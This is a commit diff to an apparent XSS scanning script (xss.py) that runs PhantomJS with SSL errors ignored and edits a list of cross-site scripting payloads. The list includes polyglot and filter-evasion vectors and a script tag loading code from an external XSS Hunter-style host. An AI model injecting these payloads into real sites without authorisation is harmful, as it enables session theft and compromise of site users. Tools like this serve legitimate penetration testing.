xss

gwen001 · Sep 27, 2022 · 823bfd8 · 823bfd8
1 parent 2202c6d
commit 823bfd8
Showing 1 changed file with 4 additions and 3 deletions.
diff --git a/xss.py b/xss.py
@@ -209,7 +209,7 @@ def realDoTest( t_params ):
 if not os.path.isfile(_phantom):
     parser.error( 'phantomjs not found!' )
 # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
-_phantom_cmd = _phantom + ' --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
+_phantom_cmd = _phantom + ' --ignore-ssl-errors=true --ssl-protocol=any --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
 # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/puppeteer-xss.js'
 # print( _phantom_cmd )
 
@@ -296,7 +296,6 @@ def realDoTest( t_params ):
 # source: https://twitter.com/brutelogic/status/1138805808328839170
 if not n_payloads:
     t_payloads = [
-        '\'"--><sVg onload=prompt(1)>',
         '\'"--><a autofocus onfocus=prompt(1) href=?>.',
         '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>',
         '\'"--><svG><scRIpt href=data:,prompt(1) />',
@@ -305,8 +304,10 @@ def realDoTest( t_params ):
         "'\")];*/prompt(1);/*",
         '" onload=prompt(1)>',
         '\'"--><SCripT src="//glc.xss.ht">',
+        '\'"--><SCripT src=https://glc.xss.ht>',
         '\'"--><sCRipt src=javascript:[1].find(prompt)>',
-        "'\"--><x v-on=_c.constructor('prompt(1)')()>",
+        "'\"--><sVg/OnLuFy=\"X=y\"oNloaD=;1^confirm(1)>/``^1//",
+        "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
     ]
 n_payloads = len(t_payloads)